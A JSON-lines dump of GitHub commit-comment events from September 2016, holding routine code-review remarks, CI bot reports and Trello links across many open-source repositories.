{"id":"4553222828","type":"CommitCommentEvent","actor":{"login":"mportuga"},"repo":{"name":"angular-ui/bower-ui-grid"},"payload":{"comment":{"id":18995541,"position":16,"line":10,"path":"bower.json","commit_id":"3813e11f2a2f3ffb4eb4d44f642e6176eaa4c285","created_at":"2016-09-13T03:21:43Z","updated_at":"2016-09-13T03:21:43Z","body":"I didn't add this... I just ran the grunt tasks... But I think that is useful for developers anyway. Because many times people want to use the js file for debugging and the minified for production. "}},"created_at":"2016-09-13T03:21:43Z"}
{"id":"4553224201","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18995542,"position":16,"line":146,"path":"lib/Settings.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T03:22:15Z","updated_at":"2016-09-13T03:22:15Z","body":"Can you remove this change? (I'll add it tonight) The reason is that you have a dependency on my branch, and shared code changes should flow from my branch to your branch. In addition, you didn't add a test and didn't follow how the rest of the getters and setters have been implemented making this change inconsistent with existing code"}},"created_at":"2016-09-13T03:22:15Z"}
{"id":"4553224909","type":"CommitCommentEvent","actor":{"login":"HugoBex"},"repo":{"name":"HugoBex/exemplos-java"},"payload":{"comment":{"id":18995543,"position":null,"line":null,"path":null,"commit_id":"0104316af74fba7a98386a87c4c6db72d99bddf3","created_at":"2016-09-13T03:22:30Z","updated_at":"2016-09-13T03:22:30Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;xMdl59w6&#x2F;12-jax-rs\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Jax-RS</a>"}},"created_at":"2016-09-13T03:22:30Z"}
{"id":"4553225692","type":"CommitCommentEvent","actor":{"login":"Sanath-K-S"},"repo":{"name":"Sanath-K-S/sv-project"},"payload":{"comment":{"id":18995544,"position":null,"line":null,"path":null,"commit_id":"69482fdcff8f8565a348026c61f413a14457461f","created_at":"2016-09-13T03:22:46Z","updated_at":"2016-09-13T03:22:46Z","body":"Vishvasam athalae ellam.... "}},"created_at":"2016-09-13T03:22:46Z"}
{"id":"4553225997","type":"CommitCommentEvent","actor":{"login":"superjeffreyc"},"repo":{"name":"BinghamtonTableTennis/rating-system"},"payload":{"comment":{"id":18995545,"position":null,"line":null,"path":null,"commit_id":"58f2cd3a489ce6e301287cf695b961505307c9a3","created_at":"2016-09-13T03:22:52Z","updated_at":"2016-09-13T03:22:52Z","body":"I also updated the environmental variables on heroku with this commit."}},"created_at":"2016-09-13T03:22:52Z"}
{"id":"4553230515","type":"CommitCommentEvent","actor":{"login":"samanthaksanders"},"repo":{"name":"springload/frontend-starter-kit"},"payload":{"comment":{"id":18995553,"position":null,"line":null,"path":null,"commit_id":"2acf67490a4494b0a50d5ea463d79ebc21c574d9","created_at":"2016-09-13T03:24:31Z","updated_at":"2016-09-13T03:24:31Z","body":"@thibaudcolas I guess there are a couple of options...You really only want to apply the aria hidden and role presentation when there isn't an svg title element. If you DO have a title inside the svg you don't then want to add aria hidden to the svg cos it's gonna presumably hide everything inside it eg. the title you don't want to hide. So I imagine you would add those hidden states to the \"use\" element if that's possible. It might just actually be better to stick to using the span with u-accessible class on it....what do you think?"}},"created_at":"2016-09-13T03:24:31Z"}
{"id":"4553231220","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18995555,"position":16,"line":146,"path":"lib/Settings.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T03:24:48Z","updated_at":"2016-09-13T03:24:48Z","body":"Another method I should tell you about is: you can make a change like this and place it in a single commit. Doing this would mean I could cherry pick the change (the single commit), thus taking the changes without taking dependency on your branch"}},"created_at":"2016-09-13T03:24:48Z"}
{"id":"4553233739","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18995560,"position":null,"line":null,"path":null,"commit_id":"f20a7b851f1a32d7611c73aa8267fb82e594ff80","created_at":"2016-09-13T03:25:45Z","updated_at":"2016-09-13T03:25:45Z","body":"It's fine. Probably just a mistake on my part when I squashed it. "}},"created_at":"2016-09-13T03:25:45Z"}
{"id":"4553234850","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18995561,"position":10,"line":10,"path":"www/js/controller.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T03:26:11Z","updated_at":"2016-09-13T03:26:11Z","body":"in js always use `===` unless you can justify using the loose equals"}},"created_at":"2016-09-13T03:26:11Z"}
{"id":"4553239839","type":"CommitCommentEvent","actor":{"login":"samanthaksanders"},"repo":{"name":"springload/frontend-starter-kit"},"payload":{"comment":{"id":18995567,"position":null,"line":null,"path":null,"commit_id":"2acf67490a4494b0a50d5ea463d79ebc21c574d9","created_at":"2016-09-13T03:28:06Z","updated_at":"2016-09-13T03:28:06Z","body":"@thibaudcolas p.s the Springload footer is doing it wrong...mainly because there is no link text at all :\\ also totally fine to add aria-hidden=\"true\" and role=\"presentation\" as long as there is some text that isn't inside that aria hidden element :)"}},"created_at":"2016-09-13T03:28:06Z"}
{"id":"4553240268","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18995569,"position":50,"line":50,"path":"www/js/controller.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T03:28:14Z","updated_at":"2016-09-13T03:28:14Z","body":"Looking good so far. "}},"created_at":"2016-09-13T03:28:14Z"}
{"id":"4553244418","type":"CommitCommentEvent","actor":{"login":"nvkelso"},"repo":{"name":"whosonfirst/whosonfirst-names"},"payload":{"comment":{"id":18995575,"position":10,"line":30,"path":"inventory/inventory.py","commit_id":"8884da5add6fb95eb42fd35ea974a0049ae8f2a3","created_at":"2016-09-13T03:29:55Z","updated_at":"2016-09-13T03:29:55Z","body":"Trailing coma, and Tilezen not Tizen"}},"created_at":"2016-09-13T03:29:55Z"}
{"id":"4553244948","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18995576,"position":5,"line":201,"path":"lib/Constants.js","commit_id":"56fe930e14b79f4b1d1fc62c59ca06174512e13a","created_at":"2016-09-13T03:30:08Z","updated_at":"2016-09-13T03:30:08Z","body":"You'd be better off messaging me to make this change in my branch. See other comment re branch dependency"}},"created_at":"2016-09-13T03:30:08Z"}
{"id":"4553245786","type":"CommitCommentEvent","actor":{"login":"juanjoarce7456"},"repo":{"name":"airabinovich/java_petri_engine"},"payload":{"comment":{"id":18995577,"position":82,"line":82,"path":"src/monitor_petri/PNMLreader.java","commit_id":"e4564f9ef24c349af144d0bc712d0a881136f83a","created_at":"2016-09-13T03:30:25Z","updated_at":"2016-09-13T03:30:25Z","body":"Please add e.printStacktrace again or log the cause of this error because it can be fatal. Newer version of this method, called \"parseFileAndGetPetriObjects()\", only returns null when an exception is thrown."}},"created_at":"2016-09-13T03:30:25Z"}
{"id":"4553247405","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18995580,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-13T03:31:02Z","updated_at":"2016-09-13T03:31:02Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - Win64-Windows-7-VisualStudio-12: OK (2335 of 2335 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-13T03:31:02Z"}
{"id":"4553256954","type":"CommitCommentEvent","actor":{"login":"arunimaChaurasia"},"repo":{"name":"CIA-FBI-RAW/INvestigate"},"payload":{"comment":{"id":18995591,"position":null,"line":null,"path":null,"commit_id":"83177550cfab24550f179397089a9bcf3798204e","created_at":"2016-09-13T03:34:48Z","updated_at":"2016-09-13T03:34:48Z","body":"new file"}},"created_at":"2016-09-13T03:34:48Z"}
{"id":"4553257311","type":"CommitCommentEvent","actor":{"login":"GregFrankVungle"},"repo":{"name":"Vungle/iOS-SDK"},"payload":{"comment":{"id":18995594,"position":null,"line":null,"path":null,"commit_id":"95e095419d4b8b321defd71bd49f463e1445c064","created_at":"2016-09-13T03:34:57Z","updated_at":"2016-09-13T03:34:57Z","body":"Lgtm"}},"created_at":"2016-09-13T03:34:57Z"}
{"id":"4553259893","type":"CommitCommentEvent","actor":{"login":"b9sk"},"repo":{"name":"zeeshanyshaikh/Codeigniter-mongo-library"},"payload":{"comment":{"id":18995599,"position":598,"line":1598,"path":"application/libraries/Mongo_db.php","commit_id":"745989e2a200322930d108910d5bb90b8654412c","created_at":"2016-09-13T03:35:56Z","updated_at":"2016-09-13T03:35:56Z","body":"second argument `array('useCursor' => false)` is important here. else the `aggregate` method returns `MongoDB\\Driver\\Cursor` instead of full result.\r\n\r\nPS: Thank You for forking the library!"}},"created_at":"2016-09-13T03:35:56Z"}
{"id":"4553260793","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18995601,"position":null,"line":null,"path":null,"commit_id":"182cfb1328b2bd96bc34a80bede61807600d05a9","created_at":"2016-09-13T03:36:18Z","updated_at":"2016-09-13T03:36:18Z","body":"whats FC log..?"}},"created_at":"2016-09-13T03:36:18Z"}
{"id":"4553263020","type":"CommitCommentEvent","actor":{"login":"chunboyu"},"repo":{"name":"chunboyu/book1"},"payload":{"comment":{"id":18995606,"position":null,"line":null,"path":null,"commit_id":"f25874c969c95304c7dc65b903a2c9bce0bc5c19","created_at":"2016-09-13T03:37:10Z","updated_at":"2016-09-13T03:37:10Z","body":"d"}},"created_at":"2016-09-13T03:37:10Z"}
{"id":"4553265525","type":"CommitCommentEvent","actor":{"login":"jadunawa"},"repo":{"name":"jadunawa/ButtsBot"},"payload":{"comment":{"id":18995611,"position":null,"line":null,"path":null,"commit_id":"14dc7383f81ac1a816dd608245104e24207ff4c7","created_at":"2016-09-13T03:38:09Z","updated_at":"2016-09-13T03:38:09Z","body":"Added a butt!"}},"created_at":"2016-09-13T03:38:09Z"}
{"id":"4553268026","type":"CommitCommentEvent","actor":{"login":"b9sk"},"repo":{"name":"zeeshanyshaikh/Codeigniter-mongo-library"},"payload":{"comment":{"id":18995619,"position":598,"line":1598,"path":"application/libraries/Mongo_db.php","commit_id":"745989e2a200322930d108910d5bb90b8654412c","created_at":"2016-09-13T03:39:10Z","updated_at":"2016-09-13T03:39:10Z","body":"second argument `array('useCursor' => false)` is important here. else the `aggregate` method returns `MongoDB\\Driver\\Cursor` instead of full result.\r\n\r\nPS: Thank You for forking the library!"}},"created_at":"2016-09-13T03:39:10Z"}
{"id":"4553268925","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18995620,"position":null,"line":null,"path":null,"commit_id":"54fbae6b6504519869f3bbc2fe6997df42432441","created_at":"2016-09-13T03:39:30Z","updated_at":"2016-09-13T03:39:30Z","body":"wow, I can't believe those were still left in code ???  I thought we got them all a long time ago."}},"created_at":"2016-09-13T03:39:30Z"}
{"id":"4553269510","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":18995622,"position":null,"line":null,"path":null,"commit_id":"ccf3c1e1b0577acbf24f04699c9019b4a0252efb","created_at":"2016-09-13T03:39:46Z","updated_at":"2016-09-13T03:39:46Z","body":"This fix is tacked-on and breaks the logic of the code. There should be two disparity inversions: one for 6b (110000) and one for 4b (0111) resulting in no net disparity inversion. I guess the problem is I tried to optimize assuming \"alt7 => disp_in == disp_inter\", which does not hold for K28.7. Does replacing disp_in with disp_inter fix the problem? (My optimization should be small or even not optimize anything at all, so this modification should be fine timing-wise)"}},"created_at":"2016-09-13T03:39:46Z"}
{"id":"4553276660","type":"CommitCommentEvent","actor":{"login":"lattner"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18995634,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-13T03:42:31Z","updated_at":"2016-09-13T03:42:31Z","body":"I share your general concern, we'll just have to watch out for breakage-in-practice that we care about, and deal with ameliorating the situation as they come up."}},"created_at":"2016-09-13T03:42:31Z"}
{"id":"4553287394","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18995645,"position":16,"line":146,"path":"lib/Settings.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T03:46:32Z","updated_at":"2016-09-13T03:46:32Z","body":"I've made this chane in my branch and have merged it to your :smile: "}},"created_at":"2016-09-13T03:46:32Z"}
{"id":"4553287547","type":"CommitCommentEvent","actor":{"login":"CDLuminate"},"repo":{"name":"BVLC/caffe"},"payload":{"comment":{"id":18995646,"position":null,"line":null,"path":null,"commit_id":"4024b82c7c8e9f12898becf7b3947e603a4dd0bb","created_at":"2016-09-13T03:46:34Z","updated_at":"2016-09-13T03:46:34Z","body":"Debian unstable and Ubuntu development branch now ship protobuf3, maybe in the future you can use that stuff instead of compiling it manually in CI scripts."}},"created_at":"2016-09-13T03:46:34Z"}
{"id":"4553290227","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":18995653,"position":null,"line":null,"path":null,"commit_id":"ccf3c1e1b0577acbf24f04699c9019b4a0252efb","created_at":"2016-09-13T03:47:38Z","updated_at":"2016-09-13T03:47:38Z","body":"And why does JESD204 use K28.7, of all special characters? It's a stupid code that messes up comma alignment."}},"created_at":"2016-09-13T03:47:38Z"}
{"id":"4553300459","type":"CommitCommentEvent","actor":{"login":"techAPJ"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":18995670,"position":null,"line":null,"path":null,"commit_id":"e46204d1958de3868259b626d84835bfd31ed9a6","created_at":"2016-09-13T03:51:30Z","updated_at":"2016-09-13T03:51:30Z","body":"Ahh, wrong commit message. 😞 \r\n\r\nShould be: \"allow long words if they contain colons\""}},"created_at":"2016-09-13T03:51:30Z"}
{"id":"4553300815","type":"CommitCommentEvent","actor":{"login":"hans0209"},"repo":{"name":"hans0209/OpenSourceClass"},"payload":{"comment":{"id":18995671,"position":null,"line":null,"path":null,"commit_id":"da6b892e639bf861f862e86903d1a821f0a5c172","created_at":"2016-09-13T03:51:39Z","updated_at":"2016-09-13T03:51:39Z","body":"소스를 바꿔주세요. "}},"created_at":"2016-09-13T03:51:39Z"}
{"id":"4553301456","type":"CommitCommentEvent","actor":{"login":"hans0209"},"repo":{"name":"hans0209/OpenSourceClass"},"payload":{"comment":{"id":18995674,"position":8,"line":8,"path":"firstOpenProject","commit_id":"da6b892e639bf861f862e86903d1a821f0a5c172","created_at":"2016-09-13T03:51:54Z","updated_at":"2016-09-13T03:51:54Z","body":"return 0;"}},"created_at":"2016-09-13T03:51:54Z"}
{"id":"4553305032","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18995680,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T03:53:17Z","updated_at":"2016-09-13T03:53:17Z","body":"```blkid | grep swap``` should tell you where a swap partition may be."}},"created_at":"2016-09-13T03:53:17Z"}
{"id":"4553306932","type":"CommitCommentEvent","actor":{"login":"tamdoancong"},"repo":{"name":"tamdoancong/4103-102-OpSys-Doan"},"payload":{"comment":{"id":18995685,"position":null,"line":null,"path":null,"commit_id":"94b205fee99c4d0af96b75345395dd7d093479c8","created_at":"2016-09-13T03:54:01Z","updated_at":"2016-09-13T03:54:01Z","body":"#!/bin/bash\r\n# Basic range in for loop\r\n\r\nfor value in {1..5}\r\ndo\r\n    echo $value\r\ndone\r\necho All done"}},"created_at":"2016-09-13T03:54:01Z"}
{"id":"4553307331","type":"CommitCommentEvent","actor":{"login":"paulouskipsk"},"repo":{"name":"paulouskipsk/Project"},"payload":{"comment":{"id":18995687,"position":1,"line":1,"path":"README.md","commit_id":"c76624c3997593ba3a43a97f8b7adb6979b6e258","created_at":"2016-09-13T03:54:12Z","updated_at":"2016-09-13T03:54:12Z","body":"teste"}},"created_at":"2016-09-13T03:54:12Z"}
{"id":"4553309297","type":"CommitCommentEvent","actor":{"login":"paulouskipsk"},"repo":{"name":"paulouskipsk/Project"},"payload":{"comment":{"id":18995689,"position":2,"line":2,"path":"README.md","commit_id":"c76624c3997593ba3a43a97f8b7adb6979b6e258","created_at":"2016-09-13T03:55:02Z","updated_at":"2016-09-13T03:55:02Z","body":"primeiro commit efetuado do site"}},"created_at":"2016-09-13T03:55:02Z"}
{"id":"4553309868","type":"CommitCommentEvent","actor":{"login":"Hondy000"},"repo":{"name":"Goraku03700/ProjectMISO"},"payload":{"comment":{"id":18995690,"position":null,"line":null,"path":null,"commit_id":"f16e9fd45b97371b7183adc9e10db8f544ab0958","created_at":"2016-09-13T03:55:14Z","updated_at":"2016-09-13T03:55:14Z","body":"クソザコナメクジ"}},"created_at":"2016-09-13T03:55:14Z"}
{"id":"4553310372","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18995692,"position":null,"line":null,"path":null,"commit_id":"c23bcfcf3a3d844f59b960de6886d331ba0109ea","created_at":"2016-09-13T03:55:27Z","updated_at":"2016-09-13T03:55:27Z","body":"its not work, revert it"}},"created_at":"2016-09-13T03:55:27Z"}
{"id":"4553311559","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18995694,"position":null,"line":null,"path":null,"commit_id":"9b83cd695bb6ad612fcdf7f0b41127bb6f312069","created_at":"2016-09-13T03:55:56Z","updated_at":"2016-09-13T03:55:56Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-13T03:55:56Z"}
{"id":"4553316763","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18995707,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-13T03:58:01Z","updated_at":"2016-09-13T03:58:01Z","body":"думаю это нужно убрать, вместо этого лучше cpusets включить"}},"created_at":"2016-09-13T03:58:01Z"}
{"id":"4553317862","type":"CommitCommentEvent","actor":{"login":"perisri101"},"repo":{"name":"apratina/docker-base"},"payload":{"comment":{"id":18995709,"position":null,"line":null,"path":null,"commit_id":"d97764e9a13d74e8927408da34f1add0c8d5b09b","created_at":"2016-09-13T03:58:28Z","updated_at":"2016-09-13T03:58:28Z","body":"clean.sh looks clean "}},"created_at":"2016-09-13T03:58:28Z"}
{"id":"4553318931","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18995712,"position":null,"line":null,"path":null,"commit_id":"9b5e164554bd6d697e3fffc3c271e086e1a1ba93","created_at":"2016-09-13T03:58:55Z","updated_at":"2016-09-13T03:58:55Z","body":"будильник и без этого работает , думаю нужно убрать"}},"created_at":"2016-09-13T03:58:55Z"}
{"id":"4553319417","type":"CommitCommentEvent","actor":{"login":"SecretlyTaco"},"repo":{"name":"SecretlyTaco/hltv-api"},"payload":{"comment":{"id":18995714,"position":8,"line":72,"path":"main.py","commit_id":"db57ac411bfa424df98b0f37e6abdc2443754196","created_at":"2016-09-13T03:59:07Z","updated_at":"2016-09-13T03:59:07Z","body":"this line makes me want to throw up omg"}},"created_at":"2016-09-13T03:59:07Z"}
{"id":"4553320901","type":"CommitCommentEvent","actor":{"login":"thisisaaronland"},"repo":{"name":"whosonfirst/whosonfirst-names"},"payload":{"comment":{"id":18995716,"position":null,"line":null,"path":null,"commit_id":"8884da5add6fb95eb42fd35ea974a0049ae8f2a3","created_at":"2016-09-13T03:59:40Z","updated_at":"2016-09-13T03:59:40Z","body":"1. Speak not to me of the madness that JSON wrought on the world with its trailing comma (not coma ;-) madness\r\n2. Okay!\r\n3. We should find out what Tizen assumes for languages"}},"created_at":"2016-09-13T03:59:40Z"}
{"id":"4553324220","type":"CommitCommentEvent","actor":{"login":"vultrcn"},"repo":{"name":"vultrcn/test"},"payload":{"comment":{"id":18995729,"position":null,"line":null,"path":null,"commit_id":"6ab4caed4713310bf923892a67a68e06276a5f14","created_at":"2016-09-13T04:00:47Z","updated_at":"2016-09-13T04:00:47Z","body":"++"}},"created_at":"2016-09-13T04:00:47Z"}
{"id":"4553326630","type":"CommitCommentEvent","actor":{"login":"madrury"},"repo":{"name":"DexGroves/talks"},"payload":{"comment":{"id":18995735,"position":null,"line":null,"path":null,"commit_id":"f6eb65d90358a380c1b37b7d11a727ccb3fa7739","created_at":"2016-09-13T04:01:43Z","updated_at":"2016-09-13T04:01:43Z","body":":thumbsup:\n\nOn Mon, Sep 12, 2016 at 8:20 PM, Derek Damron <notifications@github.com>\nwrote:\n\n> 😊\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DexGroves/talks/commit/f6eb65d90358a380c1b37b7d11a727ccb3fa7739#commitcomment-18995534>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD3dOSPr5m23LqKkpqebp6vtFYd9qm0Fks5qphZ2gaJpZM4J7Pv3>\n> .\n>\n"}},"created_at":"2016-09-13T04:01:43Z"}
{"id":"4553329817","type":"CommitCommentEvent","actor":{"login":"lakinwecker"},"repo":{"name":"cyanfish/heltour"},"payload":{"comment":{"id":18995740,"position":6,"line":748,"path":"heltour/tournament/admin.py","commit_id":"956595eb61c04a5139dc5652157b91af48d72305","created_at":"2016-09-13T04:02:58Z","updated_at":"2016-09-13T04:02:58Z","body":"I wonder if the history of moderators is useful at all?  Perhaps we should have this FK to the Season model."}},"created_at":"2016-09-13T04:02:58Z"}
{"id":"4553330220","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18995741,"position":14,"line":308,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T04:03:09Z","updated_at":"2016-09-13T04:03:09Z","body":"Yup.   Good catch. "}},"created_at":"2016-09-13T04:03:09Z"}
{"id":"4553330419","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995742,"position":7,"line":18,"path":"OmiseSwift/Endpoint.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:03:13Z","updated_at":"2016-09-13T04:03:13Z","body":"Just curious, is it possible to go: `components.reduce(url, NSURL.appendingPathComponent)`"}},"created_at":"2016-09-13T04:03:13Z"}
{"id":"4553333790","type":"CommitCommentEvent","actor":{"login":"kklin"},"repo":{"name":"NetSys/quilt"},"payload":{"comment":{"id":18995748,"position":23,"line":245,"path":"minion/docker/docker.go","commit_id":"5d9aa8b057ed76b11cc731fd70a3bfe4a267b1c2","created_at":"2016-09-13T04:04:32Z","updated_at":"2016-09-13T04:04:32Z","body":"BTW, the reason why this was broken before was the condition should be `now.Before(t)`"}},"created_at":"2016-09-13T04:04:32Z"}
{"id":"4553333849","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":18995749,"position":null,"line":null,"path":null,"commit_id":"64d692827cd45c81c13c9514ecfb7d7d7ea47114","created_at":"2016-09-13T04:04:33Z","updated_at":"2016-09-13T04:04:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HRwHwWil&#x2F;6-implement-login-with-google\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement login with google</a>"}},"created_at":"2016-09-13T04:04:33Z"}
{"id":"4553334432","type":"CommitCommentEvent","actor":{"login":"ebracho"},"repo":{"name":"ebracho/news"},"payload":{"comment":{"id":18995750,"position":null,"line":null,"path":null,"commit_id":"64d692827cd45c81c13c9514ecfb7d7d7ea47114","created_at":"2016-09-13T04:04:36Z","updated_at":"2016-09-13T04:04:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HRwHwWil&#x2F;6-implement-login-with-google\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement login with google</a>"}},"created_at":"2016-09-13T04:04:36Z"}
{"id":"4553334841","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18995753,"position":61,"line":355,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T04:04:46Z","updated_at":"2016-09-13T04:04:46Z","body":"Sounds good. "}},"created_at":"2016-09-13T04:04:46Z"}
{"id":"4553337019","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995757,"position":67,"line":67,"path":"OmiseSwift/List.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:05:40Z","updated_at":"2016-09-13T04:05:40Z","body":"`union` ? Is there an existing operator/method for this?"}},"created_at":"2016-09-13T04:05:40Z"}
{"id":"4553337373","type":"CommitCommentEvent","actor":{"login":"sminnee"},"repo":{"name":"tractorcow/recipe-plugin"},"payload":{"comment":{"id":18995759,"position":51,"line":63,"path":"src/RecipeInstaller.php","commit_id":"d715b1a779e3e890dee1e02469be0794a214f8d3","created_at":"2016-09-13T04:05:47Z","updated_at":"2016-09-13T04:05:47Z","body":"Why is this not a copy operation? This will load the file into memory rather than relying on the O/S."}},"created_at":"2016-09-13T04:05:47Z"}
{"id":"4553338437","type":"CommitCommentEvent","actor":{"login":"behlendorf"},"repo":{"name":"dinatale2/zfs-buildbot"},"payload":{"comment":{"id":18995763,"position":63,"line":357,"path":"master/master.cfg","commit_id":"42ce0e0fb17a25002b6bd2dee07a1ab1c4311040","created_at":"2016-09-13T04:06:13Z","updated_at":"2016-09-13T04:06:13Z","body":"Yeah.   Maybe bump it to 6 and we'll try and tune for 4 to start with. "}},"created_at":"2016-09-13T04:06:13Z"}
{"id":"4553339441","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995767,"position":41,"line":41,"path":"OmiseSwift/List.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:06:36Z","updated_at":"2016-09-13T04:06:36Z","body":"`insert` is a generic word, which I think maybe a good fit here."}},"created_at":"2016-09-13T04:06:36Z"}
{"id":"4553341848","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995771,"position":6,"line":6,"path":"OmiseSwift/ListRequest.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:07:34Z","updated_at":"2016-09-13T04:07:34Z","body":"what's `open` a ?"}},"created_at":"2016-09-13T04:07:34Z"}
{"id":"4553344383","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995775,"position":6,"line":6,"path":"OmiseSwift/ListRequest.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:08:35Z","updated_at":"2016-09-13T04:08:35Z","body":"oh, swift 3 :facepalm: ignore."}},"created_at":"2016-09-13T04:08:35Z"}
{"id":"4553347781","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995782,"position":43,"line":43,"path":"OmiseSwift/ListRequest.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:09:59Z","updated_at":"2016-09-13T04:09:59Z","body":"☝️ can this be adapted from some existing code? IIRC we already have this implemented somewhere."}},"created_at":"2016-09-13T04:09:59Z"}
{"id":"4553348231","type":"CommitCommentEvent","actor":{"login":"chakrit"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18995783,"position":53,"line":53,"path":"OmiseSwift/ListRequest.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T04:10:12Z","updated_at":"2016-09-13T04:10:12Z","body":"☝️ this too."}},"created_at":"2016-09-13T04:10:12Z"}
